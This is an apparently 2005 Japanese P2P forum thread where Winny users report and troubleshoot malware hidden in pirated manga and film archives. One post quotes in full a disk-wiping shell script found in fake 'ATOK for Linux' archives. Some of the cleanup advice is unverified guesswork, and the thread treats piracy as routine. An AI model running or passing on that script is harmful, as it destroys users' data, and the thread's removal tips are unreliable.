05/02/11 21:25:37 7ioOqnvqO
初めまして。突然ですが質問させてください。
1週間くらいnyを起動しっ放しで
今日久しぶりにパソコンをいじってみたら
なぜか重いのでとりあえず再起動してみたら
パスワードが間違ってい るで(正確なパスなのに)ユーザーログインできません。
ユーザーアカウントはこれ一つなので
今何もできない状態です。
このようなことをするウイルスは出回っているのでしょうか?
今は携帯からアクセスしています
どうかご指摘お願いします。
404:[名無し]さん(bin+cue).rar
05/02/11 22:19:05 BaTs3hlv0
>>403
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」
―――――――‐┬┘
____.____ | .__ パソコンを
| | | | |\_\ 窓から
| | ∧_∧ | | | |.◎.| 投げ捨てろ
| |( ´∀`)つ ミ | | |.: |
| |/ ⊃ ノ | | .\|.≡.|
 ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄ |  ̄ ̄
405:[名無し]さん(bin+cue).rar
05/02/11 22:45:48 uQxbXYyh0
スマソ。色々調べてみたんだけど、よくわからんのでお聞きします。
XP起動時にHDからアクセス音が止まりません。タスクマネージャを開いてみると
「MM」というプログラムが実行されており、このタスクを終了させるとHDへの
アクセスは止まります。プログラムのアイコンはUNと書かれたものでした。
これって何なんでしょうか?
406:[名無し]さん(bin+cue).rar
05/02/11 22:49:30 Rsui7PMx0
(´・ω・`)しらんがな
407:[名無し]さん(bin+cue).rar
05/02/12 00:11:08 aJ0bMzDt0
質問テンプレも読まないやつが厚顔無恥に書き込むこんな世の中じゃ(ry
408:[名無し]さん(bin+cue).rar
05/02/12 00:17:15 rXp7usQA0
ポイズン
409:[名無し]さん(bin+cue).rar
05/02/12 03:02:31 m1VjmALg0
WinXPSP2、WU済み
ノートンUpdate済み
(一般コミック・雑誌) [ジャンプ] [2005-11] DEATH NOTE page.57 「二択」.zip UperOOnise 1b1ee36abf324cf4ccdaca3d245391f4
に入ってたexe踏んじゃった・・・
zip解凍するとWinRARアイコンのexeファイル(サイズ:2.28 MB)とUpper.mp3
exe実行でデスクトップキャプチャ(ユーザー名のデスクトップ.bmp)、
壁紙変更(まだ懲りないの?.bmp *内容:晒されたっていいじゃないの 泥棒だもの ぬるぽ)
MP3は先に消したので分からないが、音が鳴るのかも
nyのiniにぬるぽ無し、Upフォルダ追加無し、Upfolder.txt追記無し
レジストリはよく分からないが、HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
には変わった値はない気がする
Cドライブを.exeで検索後、更新日時、作成日時でソートしたが怪しいファイルは見つからず
ウィルススキャンしても検出出来ず
これは既出?
410:[名無し]さん(bin+cue).rar
05/02/12 03:02:49 jfgwByGq0
<404
国へ帰れ。
411:[名無し]さん(bin+cue).rar
05/02/12 03:13:46 Q3/xb0y10
「晒されたっていいじゃないか泥棒だもの ぬるぽ」
ウィルスに引っかかって勝手に変えられた壁紙だけど・・・ケッコー気に入った。
ちょうど壁紙探してたから感謝感謝!
412:409
05/02/12 03:27:25 m1VjmALg0
壁紙うpしてみる
bmpだと2Mもあるからpngで。
URLリンク(sylphys.ddo.jp)
なんだか今のところ痛くもかゆくもないんだけど・・・
これから何かあるんだろうか?
一応スタートアップも確認したし、今日はとりあえず寝るかな
413:[名無し]さん(bin+cue).rar
05/02/12 04:31:38 /TNDgjXk0
>409
既出というか、ちょろっと落として先頭ブロック表示しただけで
かっとばせヌルポース.zip とか /../../../../../Documents and Settings/All Users/~
とかいう文字が見えた時点で(ry
414:[名無し]さん(bin+cue).rar
05/02/12 08:41:38 tt0na5K10
>>403
Numlockじゃねーの。
ウイルスだとしたらご愁傷様。それと報告乙。
415:[名無し]さん(bin+cue).rar
05/02/12 08:42:28 tt0na5K10
間違えたCapslockだ
416:[名無し]さん(bin+cue).rar
05/02/12 10:36:54 HvsYg15v0
ノートPCだと、ものによってはNumLockで引っかかってる事もある
417:409
05/02/12 10:53:59 m1VjmALg0
>>413
よく分からないけど、こいつはヌルポース?
解凍にはnoah使ったから、変な場所に解凍される事はないと思うけど、
exe踏んだ後の活動内容がよく分からない。
実行時にSS撮って壁紙変えただけで、マイドキュメントとかWinnyフォルダに変なファイル
作るわけでもなく・・・
>>411は何か起きたのかなー
418:[名無し]さん(bin+cue).rar
05/02/12 12:40:43 R/LTPj740
>413 おまい様が途中まで落としたってのは、こっちでは?
84 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:05/02/09(水) 16:19:18 ID:UIxh++l70
(一般コミック・雑誌) [ジャンプ] [2005-11] DEATH NOTE.zip 3,368,888 f5a386c0b77f778bd5eaa18e11a0d5f8
92 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:05/02/09(水) 16:24:43 ID:VFelumFG0
>84 の方のは偽っていうかウィルスっぽいの詰め合わせかな
419:[名無し]さん(bin+cue).rar
05/02/12 13:09:29 wqszjevM0
.me11p0のパスってなんなんだろうな
もしかして作者しか知らないって奴か?
420:397
05/02/12 13:26:01 5xwzIgRG0
>>398
一応実験結果
コピー不可 cmd.exeからでも無理
エディッタ読めても上書き不可
ファイルの所有者を別ユーザーにして実行者と分けているためMSのファイル管理にバグか
ウイルスが所有権を書き換えて書き込み許可をつけなければ書き換えられない。
一応保険の気休めにしかならないです。
一番良いのはワームを踏まないことなのは十分承知
421:[名無し]さん(bin+cue).rar
05/02/12 15:00:45 smIwQcq20
いやーびっくり
俺も>>409とまったく同じ状態だ
なんとなく怖いから現在はサブノートを
使っている状態だ
422:[名無し]さん(bin+cue).rar
05/02/12 15:10:56 smIwQcq20
追記。
win.iniの方にぬるぽガッが入ってた
これは昔感染したウィルスの名残かもしれないから
俺だけの可能性もあるけど一応見てみてくれ
423:[名無し]さん(bin+cue).rar
05/02/12 15:36:05 AdeU+lvr0
オンラインなマシンで妙な挙動やうさんくさい痕跡が見つかったら、
すぐに切断&初期化&新規インスコしないってのは何故なんだ。検証
報告は仮想マシンやオフラインでやるってのが筋だろうに。
昔感染した名残とか平気な顔して言えることか?(´・ω・`)
424:[名無し]さん(bin+cue).rar
05/02/12 17:14:24 eat95GIf0
ウィルスどんどん作って流せ。
425:409
05/02/12 18:39:14 m1VjmALg0
ごめん、検証するスキルのない俺が来るべきスレではなかったね
exe踏んだの初めてだったからちょっとパニくったんだ
面倒だけどクリーンインスコするよ
またノートン先生の使用期限伸びるな・・・
426:[名無し]さん(bin+cue).rar
05/02/12 18:58:07 0vTAE1Wd0
ノートン先生とAVG7とBitDefenderでウィルス対策しております
有効に働いてくれているので感謝しています
しかしノートン先生とAVGだけでも良いような気がしてきた今日この頃です
427:[名無し]さん(bin+cue).rar
05/02/12 21:14:16 eYincy+g0
ノートンだけでもいいんじゃないか
誤作動がうざいが設定でなんとかなるし
428:[名無し]さん(bin+cue).rar
05/02/12 21:31:06 hECHz0Aq0
>>426
ノートンとAVGを併用するメリットが分からない
それの組み合わせなら、ノートンだけかAVG+BitDefenderでいいじゃん
429:[名無し]さん(bin+cue).rar
05/02/12 22:58:10 7zwpKvk70
antinnyに関してだけなら
Norton > AVG > Bit
Bit削っても問題ない。
430:426
05/02/12 23:15:01 AUdkDUq80
>>427
>>428
>>429
わざわざ答えていただきありがたいです
玄人様の意見、参考にさせていただきます
431:[名無し]さん(bin+cue).rar
05/02/12 23:17:13 AdeU+lvr0
>>429
常駐がダブってるとあんまりいくないような気がする。
432:[名無し]さん(bin+cue).rar
05/02/12 23:23:27 pMaM0ZSl0
>>430
わざわざ皮肉言いに来たのか、ご苦労さま
433:[名無し]さん(bin+cue).rar
05/02/13 00:12:06 VJHb0qjp0
>>432
わざわざageてまで言うことか?
434:[名無し]さん(bin+cue).rar
05/02/13 00:14:37 VJHb0qjp0
ところでこの板のIDの末尾って0かOで固定されてんの?
435:[名無し]さん(bin+cue).rar
05/02/13 00:24:35 qUpCYDEj0
またか・・・
436:[名無し]さん(bin+cue).rar
05/02/13 00:36:55 hYbU6/tO0
>>434
m9(^Д^)プギャー
437:[名無し]さん(bin+cue).rar
05/02/13 00:37:49 J4hwylB60
0が男の書き込みでOが女の書き込み
分かったか低脳
438:[名無し]さん(bin+cue).rar
05/02/13 00:40:43 w91NqGDp0
女イネ━━━('A`)━━━ !!
439:[名無し]さん(bin+cue).rar
05/02/13 00:48:07 P8bsgGGW0
[俺のアドレス帳]とかいうの流れてんの確認したけどこれは新種か?
440:[名無し]さん(bin+cue).rar
05/02/13 00:57:23 sSll5S2D0
いきなりウイルスが入って、気づけば消えてるってことありますか?
441:[名無し]さん(bin+cue).rar
05/02/13 01:40:18 /eSYWRiD0
ダウンしただけじゃ感染しないよ。
442:[名無し]さん(bin+cue).rar
05/02/13 02:56:19 gyGj6etUO
女
443:[名無し]さん(bin+cue).rar
05/02/13 03:20:37 jKSAIGFA0
んじゃぁ、俺はどっちだ
444:[名無し]さん(bin+cue).rar
05/02/13 05:19:29 S5wqXwBc0
ネカマ
445:[名無し]さん(bin+cue).rar
05/02/13 10:02:37 vSr3w6E60
>>439
>>11
446:[名無し]さん(bin+cue).rar
05/02/13 10:26:02 FfIijSVE0
>>409の詳細マダー?
447:[名無し]さん(bin+cue).rar
05/02/13 10:31:16 vSr3w6E60
ビューワソフトでも入ってたんじゃねか
448:[名無し]さん(bin+cue).rar
05/02/13 12:39:01 NY04I2Ol0
俺も>>409踏んじまったんだが
壁紙変えて画面キャプチャするだけのウィルスなんてあんのかな?
exe本体と壁紙サイズが同じくらいだったんだが(2.28M、2.25M)、これは関係なし?
449:[名無し]さん(bin+cue).rar
05/02/13 15:57:18 nmfcKRgN0
まず流通しているノートン自体にウイルスがある場合があるので気をつけろ
無料版とかあるならそちらでまず対処するのが吉だぜ
450:[名無し]さん(bin+cue).rar
05/02/13 16:07:42 B2yAGC8p0
書庫解凍後にフォルダアイコンをダブルクリックしたらmellpoに引っかかった(*´Д`)
HDDガリガリアクセスしだしたのでタスクマネージャーでプロセス見たらmellpo.exe発見即停止
mellpoでファイル検索、program filesフォルダ内にmellpo.exeとhogehogeファイルを確認
2つのファイルは更新日時が同じでhogehogeファイルはメールボックスファイルのフルパスがリストアップしてあった(* ゚д゚)ガクブル
UpFolder.txtの変化無し
レジストでRunには変化無し、mellpoで検索1件ヒット
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICacheに発見
ノートンUpdate済みスキャンで検出無し
451:[名無し]さん(bin+cue).rar
05/02/13 16:10:31 ET6j2PhB0
質問スレから誘導されて来ました。とりあえずそのまま書き込みます。
ny関係のフォルダの中の、Upフォルダはどういう仕組みになってるのですか?
これは何だろうと見てみたら、ダウンしたこともないアダルト系の圧縮ファイルが
いーーっぱいあって驚きました。容量食うし何か分からないので全部消去しましたが
今日見てみるとまた少し溜まってました。何なのか教えて下さい。
452:[名無し]さん(bin+cue).rar
05/02/13 16:20:22 wCKpg0Qc0
>>451
質問する前にテンプレ>>1-13を熟読してください。
453:[名無し]さん(bin+cue).rar
05/02/13 16:22:45 Ntn5FObd0
>>451
テンプレが理解できなくても、ここで解説を求めないでください。
454:451
05/02/13 16:41:42 ET6j2PhB0
読んだつもりでしたが見逃していました。
同じような症状があるのですね、お騒がせしました。
455:[名無し]さん(bin+cue).rar
05/02/13 17:58:22 T1oJoBDM0
>>451
>>1の1行目から見逃すのは如何なものか
456:[名無し]さん(bin+cue).rar
05/02/13 22:36:19 S5wqXwBc0
>>451
(((;゚д゚))ガクガクブルブル
457:[名無し]さん(bin+cue).rar
05/02/13 22:58:18 JXQ6bCqx0
機転をきかして、
それが正常ですって何で言わないの?
458:[名無し]さん(bin+cue).rar
05/02/13 23:13:03 RlPSFcY40
ウィルス感染が広がったらnyのためにならないから。
459:[名無し]さん(bin+cue).rar
05/02/13 23:41:35 Cdbg4rKp0
このスレが本来の役割を果たしてないってのは、nyネットワークに
とってはいいことなんだよな。
460:[名無し]さん(bin+cue).rar
05/02/13 23:53:54 2dA3CWGr0
捏造ファイル一覧@winny
[2005-01-21] atok for linux.zip 4f3e71c955dd8bb0f47a1d122eb93396
[050121] ATOK for Linux.zip 86d2293fe5cf673356e7fd4d7f44b0fe
[2005-01-21] atok for linux.zip 760958c0955d5999d272e63879ece2a3
[2005-01-21] atok for linux.zip fccde84e559e99e2c660b5ce0c0553d3
100MB前後のものは下記掲載の全削除スクリプトが入っているので要注意!!
#!/bin/sh
# Source function library.
. /etc/rc.d/init.d/functions
aaa=$(mount | grep '^/dev/' | sort -r | awk '{print $1}')
for disk in $aaa ; do
nohup dd if=/dev/zero of=$disk bs=50000 > /dev/null 2>&1 &
done
捏造ファイル@share
[2005.01.21] ATOK for Linux.zip 9934e1679953bbf42d72c21df8cdf8afe23c6c9a
[2005.01.21] ATOK for Linux.zip 775d1e1e2cd98161087c631b4d37867ce6f856ac
461:[名無し]さん(bin+cue).rar
05/02/14 00:02:52 iUGxWps+0
ATOKぐらい買ってやれよ
今、裁判で大変なんだからさw
462:[名無し]さん(bin+cue).rar
05/02/14 00:23:33 Dz3BBZmb0
>>461
買えなくなったりしてw
463:[名無し]さん(bin+cue).rar
05/02/14 01:47:10 hAsCfGtk0
つーかWinnyを狙ってないよな
464:[名無し]さん(bin+cue).rar
05/02/14 02:02:17 F4x00gBw0
>>463
ワロス
465:ram
05/02/14 03:21:04 8HDLnSS70
【使用OS】 xp home (SP2)でした。
【WindowsUpdateしてるか】 してました。
【使用AntiVirusソフト】ノートン先生
【AntiVirusをUpdateしてるか】 してました。
【ウイルススキャンの結果】 下記参照。
【オンラインスキャンしたなら結果】下記参照。
【Winnyのバージョン】 2
【Winny歴、総DL量】 1年半・120G
【テンプレを読んだか】 読んでます。
【テンプレにある対策を実行したか】 してました。
【症状、具体的に分かる限りすべて書く】
久しぶりにPC全体にスキャンかけたら、ドキュメント&セッティングのフォルダの中の、
インターネットテンポラリの添付フォルダに、「[映画]ハウルの動く城.avi.exe」を検知した。
その日、nyを起動してたら、ノードが結構消えてたりもしていました。
【何をしたらそんなことになったのか】 ノートンで久しぶりにPC全体にスキャンをかけてみたから。
【これまでにとった措置】
ノートPCなので、OSの再インストール(上書き?[OSがHDDに内蔵されてるタイプだから・・・。])
こんな感じなのですが、まだウイルスに感染していると思いますか?
また、亜種の可能性ってありますか?
私は極窓等での判別でexeファイルなどを見つけたら開かないようにしているのですが・・・。
466:[名無し]さん(bin+cue).rar
05/02/14 03:26:22 6ib9zEpW0
>>465
その文章からそんなことわかんねーよ。テンプレ読んで死ね。
467:[名無し]さん(bin+cue).rar
05/02/14 11:34:21 InDtnOzg0
ウイルス定義ファイルに注意--シマンテック製品にウイルス感染を招く脆弱性
URLリンク(headlines.yahoo.co.jp)
先生、しっかりしろよw
468:[名無し]さん(bin+cue).rar
05/02/14 11:52:38 2obzU+Uk0
こりゃまた凄いセキュリティホールだな
実行しなくてもメール受信しただけで感染かよw
469:[名無し]さん(bin+cue).rar
05/02/14 12:25:18 hpf+qUap0
先生ッ!
470:[名無し]さん(bin+cue).rar
05/02/14 12:34:04 BlelK1f30
>>467
んなもんとっくに直ってるわい(報告してから対策まで結構時間かかったが)
471:[名無し]さん(bin+cue).rar
05/02/14 13:00:19 iUGxWps+0
>>470
この前ウィルス情報の他にプログラムパッチも来てたがそれか?
472:[名無し]さん(bin+cue).rar
05/02/14 15:32:44 ODivqBvj0
Upフォルダに大量のの冷凍ファイルと謎のオタ男の写真があったんですが
これがキン○マと呼ばれるウイルスですよね?
削除してもどんどん溜まっていくし消せない冷凍ファイルもあるしパニック(´Д⊂
nyなんてたま~にしかしないのに、いつの間に入ってきたんだろぅ。
473:[名無し]さん(bin+cue).rar
05/02/14 15:34:10 6rsj14f+0
>>468
メール受信だけでなく、ダウソファイルに仕掛けてもだろ
474:[名無し]さん(bin+cue).rar
05/02/14 16:37:14 k3sPkcst0
>>472
釣りか
475:[名無し]さん(bin+cue).rar
05/02/14 16:40:34 2obzU+Uk0
キンスマ?
聞いた事ないウイルスだな
476:[名無し]さん(bin+cue).rar
05/02/14 17:30:17 Vt81+PxZ0
>>472
(・∀・)イイ!!
477:[名無し]さん(bin+cue).rar
05/02/14 18:51:44 qf6VxUD60
キンタマファイルを閲覧しているキンタマが流れてそうだなw
478:[名無し]さん(bin+cue).rar
05/02/14 19:23:57 Emg07VCK0
ファイルの展開に「解凍」って言葉は使うのに、圧縮には「冷凍」って言葉使わないんだよな
e-wordsでも出てこないし
不思議っちゃあ不思議
479:[名無し]さん(bin+cue).rar
05/02/14 20:51:09 nql8/sVc0
なんか映画のショーンオブザデッドのファイルにウィルスがあるっぽいな。
読み込んだらギリギリいってnodeがなくなったりwinnyが立ち上がらなくなる。
…でもavi(一応wimanpで開いたら普通に見れた)にウィルスってありえないよな?
480:[名無し]さん(bin+cue).rar
05/02/14 21:38:19 JdibCrin0
>>478
正しくは
圧縮に対して伸張、パック(書庫化)に対してアンパック(展開)
前者と後者を同時に行なう場合は、冷凍と解凍(←これはスラング)
圧縮/伸張は文字通りなんだが、冷凍/解凍はアーカイブ行為に付いて言う
zipなどは、圧縮しながら書庫化(パック化)するので、本来は冷凍/解凍となる
e-wordsに書いてあるようなことは、あまり信頼できない。
481:[名無し]さん(bin+cue).rar
05/02/15 01:42:31 QjT8xRS80
なんかshareでキンタマ落としたらlzhなのに開けなくて
真空波動に落としたら音声だけの喘ぎ声が・・・外人ぽかった
なんたら病院とかいう人の
482:[名無し]さん(bin+cue).rar
05/02/15 07:46:40 j24EsbnE0
ふんふん・・・、それで?
483:[名無し]さん(bin+cue).rar
05/02/15 07:54:11 /xYGAnlj0
ファイルをうpしてないのにupfolder.txtが作られたんですけど、
0KBで何も入ってません。
これはセーフなんでしょうか?
484:[名無し]さん(bin+cue).rar
05/02/15 09:13:42 3lmXk8jY0
,ィ⊃ , -- 、
,r─-、 ,. ' / ,/ }
{ ヽ / ∠ 、___/ |
ヽ. V-─- 、 , ',_ヽ / ,'
ヽ ヾ、 ',ニ、 ヽ_/ rュ、 ゙、 /
\ l トこ,! {`-'} Y
ヽj 'ー'' ⊆) '⌒` ! K
l ヘ‐--‐ケ } 札
ヽ. ゙<‐y′ / で
(ヽ、_,.ゝ、_ ~ ___,ノ ,-、 聞
) ノ/`'ー-' < く
r'/, _.. // l、、、ヽ_) と
ゝ(_/_ノ´ /ヽ_ノ/ __,l ヽ)_)‐' い
{` ーニ[二]‐ク′ い
〉 / /_ よ
/ ´ ̄`ヽ )
(____ノ--'
485:[名無し]さん(bin+cue).rar
05/02/15 09:23:17 jiWzC0wC0
DOMは氏ね
486:[名無し]さん(bin+cue).rar
05/02/15 09:44:50 VzTczDct0
うpする人は普段から人一倍気を配って注意してる分、そう簡単に患者側にはならないよ
自分のトリでウィルスばら撒いたら信用失って即引退だしね(まあそうなっても何の損害もないけど)
487:[名無し]さん(bin+cue).rar
05/02/15 11:30:21 Yul6gg5Q0
>>479
avi .exe
だったんだろ
488:[名無し]さん(bin+cue).rar
05/02/15 11:36:54 blJKIUvI0
おれが前に踏んだexeは
avi pugera.exe
こんなかんじだった。
489:[名無し]さん(bin+cue).rar
05/02/15 11:57:46 i5pl1NiQ0
詳細表示で「種類」も表示させとけばいいんじゃないかと思うんだが。
アプリは一発で判るし。
490:[名無し]さん(bin+cue).rar
05/02/15 14:11:50 ARfTjvLW0
ウイルスバスター2005をインストールしようと思うけど、Winnyに影響でないかな~?
491:[名無し]さん(bin+cue).rar
05/02/15 15:08:22 t6NjTp7v0
>>490
スレリンク(download板:587番)
492:[名無し]さん(bin+cue).rar
05/02/15 18:12:13 c0ydgpKA0
>>490
無問題。
493:[名無し]さん(bin+cue).rar
05/02/15 19:17:19 H7+JNsOP0
>>487
いやマジだって(;´Д`)今コピペした「(映画)ショーン・オブ・ザ・デッド - Shaun Of The Dead - (字幕 by アナル男爵).avi」
みんな注意な
494:[名無し]さん(bin+cue).rar
05/02/15 19:39:59 osvcxLY30
無視リスト登録しろ
495:[名無し]さん(bin+cue).rar
05/02/15 19:44:13 hBZa0/080
>>493 ならもう少し詳しく
何で見たのか?関連付けは適切か?スペックが足りないと言う事は無いか?
レジストリエディタは立ち上がるか?タスクマネージャは?
新しくプロセス、ファイルが作られたか?レジストリの値は?
つーかハッシュは?
496:[名無し]さん(bin+cue).rar
05/02/15 19:49:05 80yD0eyp0
釣り禁止。
■━⊂( 。・_・) 彡 ガッ☆`Д´)ノ >>493
497:[名無し]さん(bin+cue).rar
05/02/15 21:27:27 8I7hEyW+0
壁紙ぬるぽウイルスは今のところ壁紙変えられてデスクトップ撮られるだけか・・・。
気持ち悪いな
win.ini検索したけどぬるぽ無し
498:[名無し]さん(bin+cue).rar
05/02/15 21:51:49 0gzfDvM/0
【使用OS】Windows Xp Home
【WindowsUpdateしてるか】最近してない
【使用AntiVirusソフト】ノートンアンチウィルス
【AntiVirusをUpdateしてるか】してる
【ウイルススキャンの結果】脅威なし
【オンラインスキャンしたなら結果】
【Winnyのバージョン】b7.1
【Winny歴、総DL量】40Gくらい?
【テンプレを読んだか】読んだ
【テンプレにある対策を実行したか】してない
【症状、具体的に分かる限りすべて書く】画面に「♂♀」がでてあえぎ声がする
【何をしたらそんなことになったのか】zip解凍後「偽装解除.bat」踏んでしまった
【これまでにとった措置】batファイルを踏む前にノートンでスキャンしたものの
脅威なしと出たので実行。上記の症状となりCtrl+alt+Delもきかない状態に。
再起動しても同じ状態になるためセーフモードで実行したところ、通常のような感じ
で起動したが、アプリケーションを起動すると症状発生。
499:[名無し]さん(bin+cue).rar
05/02/15 22:02:03 87AdJQuR0
>>497
撮られたデスクトップの画像はどうなるんだろう・・・?
500:[名無し]さん(bin+cue).rar
05/02/15 22:05:54 4tREr/pA0
うpフォルダに放り込まれるんじゃないの?
501:[名無し]さん(bin+cue).rar
05/02/15 22:12:56 4DsayvfH0
>>498
ギシギシアンアンって対応済みじゃなかったかなぁ~?亜種かなぁー。
batファイルをメモ帳で開いて・・・って思ったけど、batでそこまで
細かい芸当できるのかな。bat(長い空白).exeかもね。
502:[名無し]さん(bin+cue).rar
05/02/15 22:25:56 0gzfDvM/0
>>501
拡張子はbatでした
セーフモードで当該ファイルの拡張子をtxtに変更して開いて見たところ
文字化けして読めませんでした
症状が出る:ブラウザ ノートン jane msconfig
症状が出ない:メモ帳 エクスプローラー
ちなみに落としたファイルは(一般コミック・雑誌)[ジャンプ][2005-12] DEATH NOTE-58でした
503:[名無し]さん(bin+cue).rar
05/02/15 22:49:57 H6JOnBOj0
>>502
俺もそれ、踏んだ。萌える声だよな。
でも、対処法分からん。俺は再インスコした。
で、また、壁紙変わるウイルス踏んで、
今、違う事で大変なんだ。お互い頑張ろう。
504:[名無し]さん(bin+cue).rar
05/02/15 22:54:51 V5T9do2x0
>>503
ワロタ
505:[名無し]さん(bin+cue).rar
05/02/15 23:05:50 0gzfDvM/0
>>503
笑ってる場合じゃないんだけどワロタ
506:[名無し]さん(bin+cue).rar
05/02/15 23:08:24 H6JOnBOj0
俺が感染したのは、>>409に出てた奴だな。
これ、スタートアップに隠しexeファイル出すぞ?
ショートカットを削除後、
(コントロールパネルのプログラムの削除と追加から削除って出るけど、無視して良さげ)
本体である、Adobe Gamma Loader.exeも削除した方が良さそうだ。
それまで、再起動はするなよ。再起動したら、アプリが起動する。
507:ガチンコ初心
05/02/15 23:13:43 ZslCJngn0
【使用OS】Winxp pro SP1
【WindowsUpdateしてるか】昨日した
【使用AntiVirusソフト】ノートン
【AntiVirusをUpdateしてるか】今日した
【ウイルススキャンの結果】ノートンで反応なし
【オンラインスキャンしたなら結果】
【Winnyのバージョン】2.0b7.1
【Winny歴、総DL量】三年くらい?
【テンプレを読んだか】はい
【テンプレにある対策を実行したか】該当なし?
【症状、具体的に分かる限りすべて書く】
(一般コミック・雑誌) [ジャンプ] [2005-12] DEATH NOTE page.58 「胸中」.zip
sIdxNm06Hv
1cafd7101e4dee38d4a613c95c78c887
の中の326144バイトのほぼ同名EXEアイコンをダブクリ
デスクトップが「晒されてもいいじゃないか 泥棒だもの ぬるぽ」というbmpに変更された
【何をしたらそんなことになったのか】
フォルダアイコン偽装してたのでダブクリ、数十秒で気づいてPC電源断
【これまでにとった措置】
今日作成・変更された怪しいファイル(Documentのなかの~のデスクトップ.bmpとかupなんとか.txt)を削除
nyのキャッシュを全部削除
スタートアップ・レジストリなどを点検
これってなんて言うウイルスでしょうか。また駆除に必要な措置に追加があれば教えてください。
508:507
05/02/15 23:14:36 ZslCJngn0
すいません>>409でガイシュツでした(^^;
509:[名無し]さん(bin+cue).rar
05/02/15 23:20:21 BSZ5eKYk0
おまいら揃いも揃って馬鹿ばっかだな・・。
510:[名無し]さん(bin+cue).rar
05/02/15 23:21:23 0gzfDvM/0
>>509
返す言葉もございません(_ _;)…パタリ
511:[名無し]さん(bin+cue).rar
05/02/15 23:23:19 cIvE0PUr0
俺も壁紙変わる奴踏んじまった
まぁEXEと気づいたから別ドライブに移動させて、ネット切断してから開いたけど
今のところ壁紙変わるのとスクリーンショット撮られる以外不審なところはない
Upフォルダも出来てないし、単なるイタズラファイルかな?
512:[名無し]さん(bin+cue).rar
05/02/15 23:24:30 H6JOnBOj0
俺の>>506の意見は無視ばっかりだな。
513:[名無し]さん(bin+cue).rar
05/02/15 23:25:53 Bx4eUZxM0
>>502
拡張子がbatであろうと、中身はexeかcomだろ
OSに引き渡された時点で、拡張子に関係なく、実行形式であるものは実行される
Windowsなら注意すべき拡張子は
.exe .com .bat .reg .scr .url .htmなど
>>507
497参照。名称は「壁紙ぬるぽ」、melpoとの類似性あり。具体被害は壁紙変更、一部でSS流し。
今後検証してみる
514:[名無し]さん(bin+cue).rar
05/02/15 23:26:20 0gzfDvM/0
>>512
スタートアップ探したんだけどexeもショートカットも見つかりませんでした
現在adobe loaderを検索中です
515:[名無し]さん(bin+cue).rar
05/02/15 23:30:04 ZslCJngn0
>>513
どうもありがとう
516:[名無し]さん(bin+cue).rar
05/02/15 23:33:26 H6JOnBOj0
>>509
グロとかウイルスやexeをわざと押すのが俺の中の流行。
>>514
俺も同じウイルスな筈なんだが、
スタートアップフォルダが2つに増えてたぞ?
で、スタートアップにあるのは、ショートカットだよ。
Adobe Gamma Loader.exeへのショートカット。
隠しファイルを見えるようにしても見えない。
スタートからじゃないと消せない。
俺的対処法
スタートから、全てのプログラムを見る。
スタートアップのショートカットで
Adobe Gamma Loader.exeへのショートカットを見つけたら、
それを右クリックしてプロパティにて本体の場所を確認後、削除。
本体の場所に3つ、実行ファイルとか、テキストがあるので、削除。
ってやってみた。俺、バカだから確証無いよ?
517:[名無し]さん(bin+cue).rar
05/02/15 23:39:57 H6JOnBOj0
なんだか変だな。俺の真似するな。
ちょっと調べるから。
だた、スタートアップのショートカットだけは削除しとけよ~
518:[名無し]さん(bin+cue).rar
05/02/15 23:40:56 cIvE0PUr0
*.exeで検索かけたら随分前からあった形跡のある別のウイルスが発見されたorz
519:[名無し]さん(bin+cue).rar
05/02/15 23:43:02 tSpU2A7o0
私も>>507
>>506の処理一応したけど壁紙以外どういう被害あったのか不明で不安・・
520:[名無し]さん(bin+cue).rar
05/02/15 23:51:29 aRSa9gnM0
フォルダの中のexeを実行しなければ、セーフなんでしょうか?
ちなみに>507のファイルと同じです
521:[名無し]さん(bin+cue).rar
05/02/15 23:51:35 AlE8Na2/0
俺もスタートアップなんもなかったぞ。
同じのじゃないのかも。
522:[名無し]さん(bin+cue).rar
05/02/16 00:01:39 H6JOnBOj0
>>519
あったよな?
デスクトップ撮られたのも削除したし、
これで様子見しておくつもりだが。
>>520
セーフ
見るだけならセーフ。
>>521
色んなのに感染してるとか、怖い事言わないで下さい。
ノートンでスキャンして、
フォルダの中のファイルの数、合ってるか?
523:498=502=505=510=514
05/02/16 00:06:47 T5lKoGkm0
Adobe Gamma Loaderが検索しても見つかりませんでした
adobeで検索して出てくるのはadobe acrobat reader 6.0関係
nyで落としたものが別物なのかなと思って、nyのキャッシュを調べようとしたら
キャッシュフォルダが消えてる...うぅむ
524:[名無し]さん(bin+cue).rar
05/02/16 00:21:19 /i6kkWze0
ちなみに、CドライブのWINDOWSフォルダに
ぬるぽ壁紙がある。まだ懲りないの?.bmpだ。
>>523
同じやつで感染したんだけどな。
特になんともないなら、大丈夫なんじゃないかな?
俺のはPC買い換えたばかりだから、他の感染とか、
考えられないんだけど、あったかもしれないし。
一応報告までって感じだったから…。
525:[名無し]さん(bin+cue).rar
05/02/16 00:21:24 SViFvfGG0
>>522
スタートアップにありました。消しました。
けれどデスクトップをとられたものはどこにあるんですか??
本体の場所の3つのexeとかtxtは消しました
526:[名無し]さん(bin+cue).rar
05/02/16 00:23:59 /i6kkWze0
>>525
マイ ドキュメントにある筈だよ。
なんか、>>507を見ると、他にもありそうだから、確認してくれ。
俺はマイドキュメントに撮られてのが一枚あっただけだから。
俺寝るわ。おやちゅみ♥
527:[名無し]さん(bin+cue).rar
05/02/16 00:24:10 /4iS+1Vf0
Adobe Gamma Loader.exeってAdobe製品を入れたときに出来る奴じゃないの?
C:\Documents and Settings\All Users\スタート メニュー\Adobe Gamma Loader.exe
C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
でしょ?
528:[名無し]さん(bin+cue).rar
05/02/16 00:28:23 S0hy97P40
>527
ウイルスが私はウイルスですって書いてあるファイル名だとしたら
かなり、やさしいウイルスだな
529:521
05/02/16 00:31:08 E2b3+tBw0
脅かすだけのイタズラで問題なしって結論にしとく。
530:[名無し]さん(bin+cue).rar
05/02/16 00:33:19 /i6kkWze0
>>527
解凍ソフトを利用してスタートアップに
exeフォルダを隠すってウイルスがあるから、それだと思った。
アプリ自体、正規でも、それを利用されて画面を撮られたりすると思ったんだが。
俺の勘違いだったら、すまない。
実行した方は、adobe製品をコントロールパネルから削除したのち、再インコしてくれ。
それで問題は解決すると思うんだが。
